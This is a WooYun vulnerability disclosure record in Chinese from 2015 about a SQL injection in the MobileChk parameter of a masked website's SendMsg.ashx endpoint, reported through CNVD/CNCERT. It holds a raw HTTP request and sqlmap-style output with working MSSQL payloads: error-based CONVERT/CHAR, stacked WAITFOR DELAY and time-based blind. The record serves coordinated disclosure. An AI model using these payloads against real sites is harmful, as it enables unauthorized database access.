乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-11-27: 细节已通知厂商并且等待厂商处理中 2015-12-01: 厂商已经确认,细节仅向厂商公开 2015-12-11: 细节向核心白帽子及相关领域专家公开 2015-12-21: 细节向普通白帽子公开 2015-12-31: 细节向实习白帽子公开 2016-01-15: 细节向公众公开
RT
漏洞地址:
POST /ashx/SendMsg.ashx HTTP/1.1Host: **.**.**.**Proxy-Connection: keep-aliveContent-Length: 21Accept: text/plain, */*; q=0.01Origin: http://**.**.**.**X-Requested-With: XMLHttpRequestUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36Content-Type: application/x-www-form-urlencodedReferer: http://**.**.**.**/Register.aspxAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.8Cookie: Hm_lvt_d71f39ec68e78d8cdfff5c873ae7666a=1448456767; Hm_lpvt_d71f39ec68e78d8cdfff5c873ae7666a=1448456767; ASP.NET_SessionId=mp1kwsi5o30rcrymhr4o3qreMobileChk=18988888888
MobilChk参数存在注入
---Parameter: MobileChk (POST) Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: MobileChk=18616791169' AND 1096=CONVERT(INT,(SELECT CHAR(113)+CHAR(113)+CHAR(120)+CHAR(120)+CHAR(113)+(SELECT (CASE WHEN (1096=1096) THEN CHAR(49)ELSE CHAR(48) END))+CHAR(113)+CHAR(120)+CHAR(122)+CHAR(122)+CHAR(113))) AND 'pgpB'='pgpB Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries (comment) Payload: MobileChk=18616791169';WAITFOR DELAY '0:0:5'-- Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind (comment) Payload: MobileChk=18616791169' WAITFOR DELAY '0:0:5'-----[21:11:05] [INFO] the back-end DBMS is Microsoft SQL Serverweb server operating system: Windowsweb application technology: ASP.NET 0back-end DBMS: Microsoft SQL Server 2008
过滤
危害等级:中
漏洞Rank:10
确认时间:2015-12-01 15:22
CNVD确认并复现所述漏洞情况,已经转由CNCERT下发给福建分中心,由福建分中心后续协调网站管理单位处置。
暂无